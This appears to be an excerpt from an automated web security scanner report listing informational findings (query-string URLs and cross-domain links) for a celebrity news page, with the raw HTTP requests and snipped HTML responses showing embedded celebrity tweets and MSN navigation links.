<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31711564050472961">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/23936_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Jillzarin">Jillzarin</a>: On plane wish i could call in!RT <a href="http://twitter.com/lxnewyork">@lxnewyork</a> Getting ready to chat with our favorite sunday morning show <a href="http://twitter.com/lxtvopenho">@lxtvopenho</a>... <a href="http://tl.gd/8g30qb">http://tl.gd/8g30qb</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Jillzarin/statuses/31705598416392194">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/23936_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Jillzarin">Jillzarin</a>: So happy. Flying <a href="http://twitter.com/continental">@continental</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Jillzarin/statuses/31705092302315520">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4884_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/davenavarro6767">davenavarro6767</a>: <a href="http://twitter.com/Banshee_Song">@Banshee_Song</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/davenavarro6767/statuses/31690324585742336">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4884_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/davenavarro6767">davenavarro6767</a>: <a href="http://twitter.com/buddyhead">@buddyhead</a> <a href="http://youtu.be/fX_120DMFDQ">http://youtu.be/fX_120DMFDQ</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/davenavarro6767/statuses/31688081048342528">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4884_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/davenavarro6767">davenavarro6767</a>: <a href="http://twitter.com/ipierce89">@ipierce89</a> Oh no! Yur not DRIVING <a href="http://twitter.com/OMGitsjessielee">@OMGitsjessielee</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/davenavarro6767/statuses/31674584327528449">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4483_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/joshgroban">joshgroban</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/joshgroban/statuses/31672009905672192">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4483_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/joshgroban">joshgroban</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/joshgroban/statuses/31671556916645888">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/44221_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rzrachelzoe">rzrachelzoe</a>: RT <a href="http://twitter.com/prabalgurung">@prabalgurung</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rzrachelzoe/statuses/31667825831579649">Twitter</a>
...[SNIP]...
<li><a href="http://www.delish.com/recipes/cooking-recipes/tailgating-football-recipes?ocid=xnetr1-3">Tailgating time: 10 winning recipes</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/watch/video/celebrity-gridiron-fans/ufd8pil8?q=Football+Fan&rel=msn&from=en-us_msnhp&form=MSNXNM&ocid=xnetr1-5">Bing video: Celebrity gridiron fans</a>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" >BLTWY</a>
...[SNIP]...
<li class="hasMenu" id="hasMenu2"><a href="http://msn.foxsports.com/" class="hasMenuLink">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" >MLB</a></li><li><a href="http://msn.foxsports.com/nascar " >NASCAR</a></li><li><a href="http://msn.foxsports.com/nba" >NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball" >NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb" >NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl" >NFL</a></li><li><a href="http://msn.foxsports.com/nhl" >NHL</a></li><li><a href="http://msn.foxsports.com/fantasy" >Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer" >Soccer</a></li><li class="last"><a href="http://msn.foxsports.com/video?from=en-us_msnhp" >Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" >Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/" > Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " > Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" >Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" >Video</a>
...[SNIP]...
<li class="last"><a href="http://insidemsn.wordpress.com" >Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/" >White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/" >Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2" >Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " >Travel</a>
...[SNIP]...
<li class="bingLink last"><a href="http://www.bing.com/search?FORM=CWWWBQ" >Bing</a>
...[SNIP]...
<li><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank" class="pass">MSN Privacy</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/Entertainment.aspx" onclick="window.open(this.href,'help','width=960,height=720,resizeable=yes,status=no,titlebar=no,toolbar=no'); return false;" class="ignore" target="blank">Help</a>
...[SNIP]...
</p><a href="http://microsoft.com" >Microsoft</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

22.364. http://wonderwall.redacted/tv/jaime-pressly-files-for-divorce-1594033.story

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wonderwall.redacted
Path:   /tv/jaime-pressly-files-for-divorce-1594033.story

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /tv/jaime-pressly-files-for-divorce-1594033.story?gt1=28135 HTTP/1.1
Host: wonderwall.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 23:51:53 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if lt IE 7]> <html class="ie ie6 lte9 lte8 lte7" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<meta name="Search.Image" content="http://static.wonderwall.com/photos/Module1x1/43716_Module1x1.jpg" />
<link rel="image_src" href="http://static.wonderwall.com/photos/Module1x1/43716_Module1x1.jpg" />

<meta property="fb:app_id" content="111376106992" />
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js"></script>
...[SNIP]...
</script>
<script src="http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<link rel="stylesheet" type="text/css" href="http://static.wonderwall.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.css" />
<link rel="stylesheet" type="text/css" href="http://static.wonderwall.com/cache/css/1296066112/Z2FsbGVyeS5jc3M7Z2FsbGVyeS1zaXRlLmNzcztzdG9yeS5jc3M7c3Rvcnktc2l0ZS5jc3M7dG9wU3Rvcmllcy5jc3M7dG9wU3Rvcmllcy1zaXRlLmNzcztjYXRlZ29yeS5jc3M7Y2F0ZWdvcnktc2l0ZS5jc3M7dmlkZW8uY3NzO3ZpZGVvLXNpdGUuY3NzO3ZpZGVvQ2hhbm5lbHMuY3NzO2NlbGVicml0aWVzLmNzcztjZWxlYnJpdGllcy1zaXRlLmNzcztjZWxlYnJpdHkuY3NzO2NlbGVicml0eS1zaXRlLmNzcztodWIuY3NzO2h1Yi1zaXRlLmNzcztzaXRlU2VhcmNoLmNzcztzaXRlU2VhcmNoLXNpdGUuY3NzO2dlbmVyaWMuY3NzO2dlbmVyaWMtc2l0ZS5jc3M7Z2FtZS5jc3M7Z2FtZS1zaXRlLmNzcztzcGVjaWFsLmNzcztzcGVjaWFsLXNpdGUuY3Nz.css" />
<link rel="stylesheet" media="only screen and (max-device-width: 480px)" href="http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css" />
<link rel="stylesheet" media="only screen and (min-device-width: 481px) and (max-device-width: 1024px)" href="http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css" />
</head>
...[SNIP]...
<span><img src="http://static.wonderwall.com/photos/Original/43716_Original.jpg" class="imgSrc-http://static.wonderwall.com/photos/Original/43716_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/43714_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/11742_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/44867_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/31223_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/43563_Original.jpg" alt="/" /></span>
...[SNIP]...
<li class="shareItem shareItem-twitter"><a href="http://twitter.com/share?original_referer=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story%3Focid%3Dtwtr-utweet" class="twitterProxy"></a>
...[SNIP]...
<li class="shareItem shareItem-windowsLive first"><a href="https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story" target="_blank">Windows Live</a>
...[SNIP]...
<li class="shareItem shareItem-delicious"><a href="http://del.icio.us/post?title=Jaime+Pressly+Files+For+Divorce&url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story" target="_blank">Delicious</a></li><li class="shareItem shareItem-myspace"><a href="http://www.myspace.com/Modules/PostTo/Pages/?l=3t=Jaime+Pressly+Files+For+Divorce&u=http%3A%2F%2Fwonderwall.msn.com%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story" target="_blank">MySpace</a></li><li class="shareItem shareItem-digg"><a href="http://digg.com/submit?phase=2title=Jaime+Pressly+Files+For+Divorce&url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story" target="_blank">Digg</a></li><li class="shareItem shareItem-mixx"><a href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story" target="_blank">Mixx</a></li><li class="shareItem shareItem-reddit last"><a href="http://reddit.com/submit?title=Jaime+Pressly+Files+For+Divorce&url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story" target="_blank">Reddit</a>
...[SNIP]...
<P ALIGN="LEFT"><A HREF="http://www.usmagazine.com/healthylifestyle/photos/2010s-biggest-splits-2010112" TARGET="_blank">PHOTOS: See what other stars have called it quits</A>
...[SNIP]...
<P ALIGN="LEFT"><A HREF="http://cdn.usmagazine.com/moviestvmusic/photos/mugshots-of-the-year-20102212" TARGET="_blank">PHOTOS: Check out these celebrity mugshots</A>
...[SNIP]...
<P ALIGN="LEFT"><A HREF="http://www.usmagazine.com/stylebeauty/photos/weddings-of-the-year-2009-20091012/5623" TARGET="_blank">PHOTOS: Jaime and Simran's personal wedding pic</A>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15894_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/michaelianblack">michaelianblack</a>: <a href="http://twitter.com/BrianLynch">@BrianLynch</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/michaelianblack/statuses/31490865776037888">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/41323_Module1x1_634261162153428902.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/emmyrossum">emmyrossum</a>: Day off today, <a href="http://twitter.com/emmarosekenney">@emmarosekenney</a> and I hit up <a href="http://twitter.com/dovetailchicago">@dovetailchicago</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/emmyrossum/statuses/31490256649850880">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15894_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/michaelianblack">michaelianblack</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/michaelianblack/statuses/31488824462811136">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/27217_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rihanna">rihanna</a>: <a href="http://twitter.com/__shelovesB">@__shelovesB</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rihanna/statuses/31485881311297536">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15298_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/csiriano">csiriano</a>: Important! Various ticket websites are selling fake tickets to my fashion show. I wish everyone who wanted to (cont) <a href="http://tl.gd/8fkbn3">http://tl.gd/8fkbn3</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/csiriano/statuses/31485259056943104">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/27217_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rihanna">rihanna</a>: #puppyNAVY ? RT <a href="http://twitter.com/RicardoFenty">@RicardoFenty</a>: #DogNavy <a href="http://twitpic.com/3kde2c">http://twitpic.com/3kde2c</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rihanna/statuses/31484086254051328">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/27217_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rihanna">rihanna</a>: <a href="http://twitter.com/StevenGParry">@StevenGParry</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rihanna/statuses/31482886624378880">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/9389_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/PerezHilton">PerezHilton</a>: <a href="http://twitter.com/PaulaAbdul">@PaulaAbdul</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/PerezHilton/statuses/31481637023784960">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/8376_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/BowWow">BowWow</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/BowWow/statuses/31481112115019776">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/25615_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/DJPaulyD">DJPaulyD</a>: RT <a href="http://twitter.com/izzy_kardashian">@izzy_kardashian</a>: "I beat that beat up, call it self defense" you know you've made it when Lil Wayne quotes you in a song - <a href="http://twitter.com/DJPaulyD">@DJPaulyD</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/DJPaulyD/statuses/31480933047603200">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7503_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/AubreyODay">AubreyODay</a>: LOVE emotional tweets, awe xoxo! "<a href="http://twitter.com/2RQ">@2RQ</a>: <a href="http://twitter.com/AubreyODay">@AubreyODay</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/AubreyODay/statuses/31478843529232385">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/1226_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/llcoolj">llcoolj</a>: <a href="http://twitter.com/ashleeRocs">@ashleeRocs</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/llcoolj/statuses/31477242445959168">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7503_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/AubreyODay">AubreyODay</a>: Me shooting with the great <a href="http://twitter.com/avoyermagyan">@avoyermagyan</a> <a href="http://twitter.com/traverrains">@traverrains</a> <a href="http://twitter.com/kurumiuchino">@kurumiuchino</a>! <a href="http://twitpic.com/3umrxp">http://twitpic.com/3umrxp</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/AubreyODay/statuses/31475592251580417">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7877_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rainnwilson">rainnwilson</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rainnwilson/statuses/31475437494345729">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15124_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/LoBosworth">LoBosworth</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/LoBosworth/statuses/31474891412738048">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/samantharonson">samantharonson</a>: <a href="http://twitter.com/racheljosephf">@racheljosephf</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/samantharonson/statuses/31474364587180033">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/samantharonson">samantharonson</a>: <a href="http://twitter.com/barbara230">@barbara230</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/samantharonson/statuses/31474068645478400">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/samantharonson">samantharonson</a>: RT <a href="http://twitter.com/AIDSPolicyProj">@AIDSPolicyProj</a>: <a href="http://twitter.com/samantharonson">@samantharonson</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/samantharonson/statuses/31473906485297152">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/samantharonson">samantharonson</a>: RT <a href="http://twitter.com/AIDSPolicyProj">@AIDSPolicyProj</a>: <a href="http://twitter.com/samantharonson">@samantharonson</a> Egyptian activists are cobbling together their own internet: <a href="http://bit.ly/e3toNb">http://bit.ly/e3toNb</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/samantharonson/statuses/31473844573179904">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15856_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/mccordalex">mccordalex</a>: <a href="http://twitter.com/Punch800">@Punch800</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/mccordalex/statuses/31471195719208960">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7477_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/iamdiddy">iamdiddy</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/iamdiddy/statuses/31469852891807744">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7895_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/SarahKSilverman">SarahKSilverman</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/SarahKSilverman/statuses/31469730384580608">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/18487_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/MirandaBuzz">MirandaBuzz</a>: A picture of towel art in the hotel. The elephant in the room. ;) <a href="http://yfrog.com/hsi3mlfj">http://yfrog.com/hsi3mlfj</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/MirandaBuzz/statuses/31469606199623680">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/32972_Module1x1_634164434770437095.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/KimKardashian">KimKardashian</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/KimKardashian/statuses/31468574493114368">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/32972_Module1x1_634164434770437095.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/KimKardashian">KimKardashian</a>: Hate when that happens! Lol RT <a href="http://twitter.com/CarlaDiBello">@CarlaDiBello</a> RT <a href="http://twitter.com/PeterGriffinn">@PeterGriffinn</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/KimKardashian/statuses/31468288559030272">Twitter</a>
...[SNIP]...
<li><a href="http://www.delish.com/recipes/cooking-recipes/tailgating-football-recipes?ocid=xnetr1-3">Tailgating time: 10 winning recipes</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/watch/video/celebrity-gridiron-fans/ufd8pil8?q=Football+Fan&rel=msn&from=en-us_msnhp&form=MSNXNM&ocid=xnetr1-5">Bing video: Celebrity gridiron fans</a>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" >BLTWY</a>
...[SNIP]...
<li class="hasMenu" id="hasMenu2"><a href="http://msn.foxsports.com/" class="hasMenuLink">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" >MLB</a></li><li><a href="http://msn.foxsports.com/nascar " >NASCAR</a></li><li><a href="http://msn.foxsports.com/nba" >NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball" >NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb" >NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl" >NFL</a></li><li><a href="http://msn.foxsports.com/nhl" >NHL</a></li><li><a href="http://msn.foxsports.com/fantasy" >Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer" >Soccer</a></li><li class="last"><a href="http://msn.foxsports.com/video?from=en-us_msnhp" >Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" >Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/" > Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " > Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" >Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" >Video</a>
...[SNIP]...
<li class="last"><a href="http://insidemsn.wordpress.com" >Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/" >White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/" >Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2" >Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " >Travel</a>
...[SNIP]...
<li class="bingLink last"><a href="http://www.bing.com/search?FORM=CWWWBQ" >Bing</a>
...[SNIP]...
<li><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank" class="pass">MSN Privacy</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/Entertainment.aspx" onclick="window.open(this.href,'help','width=960,height=720,resizeable=yes,status=no,titlebar=no,toolbar=no'); return false;" class="ignore" target="blank">Help</a>
...[SNIP]...
</p><a href="http://microsoft.com" >Microsoft</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

22.365. http://wonderwall.redacted/tv/jaime-pressly-files-for-divorce-1594033.story

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wonderwall.redacted
Path:   /tv/jaime-pressly-files-for-divorce-1594033.story

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /tv/jaime-pressly-files-for-divorce-1594033.story?gt1=28135 HTTP/1.1
Host: wonderwall.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 16:59:17 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
Age: 1
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if lt IE 7]> <html class="ie ie6 lte9 lte8 lte7" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<meta name="Search.Image" content="http://static.wonderwall.com/photos/Module1x1/43716_Module1x1.jpg" />
<link rel="image_src" href="http://static.wonderwall.com/photos/Module1x1/43716_Module1x1.jpg" />

<meta property="fb:app_id" content="111376106992" />
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js"></script>
...[SNIP]...
</script>
<script src="http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<link rel="stylesheet" type="text/css" href="http://static.wonderwall.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.css" />
<link rel="stylesheet" type="text/css" href="http://static.wonderwall.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.css" />
<link rel="stylesheet" media="only screen and (max-device-width: 480px)" href="http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css" />
<link rel="stylesheet" media="only screen and (min-device-width: 481px) and (max-device-width: 1024px)" href="http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css" />
</head>
...[SNIP]...
<span><img src="http://static.wonderwall.com/photos/Original/43716_Original.jpg" class="imgSrc-http://static.wonderwall.com/photos/Original/43716_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/43714_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/11742_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/44867_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/31223_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/43557_Original.jpg" alt="/" /></span>
...[SNIP]...
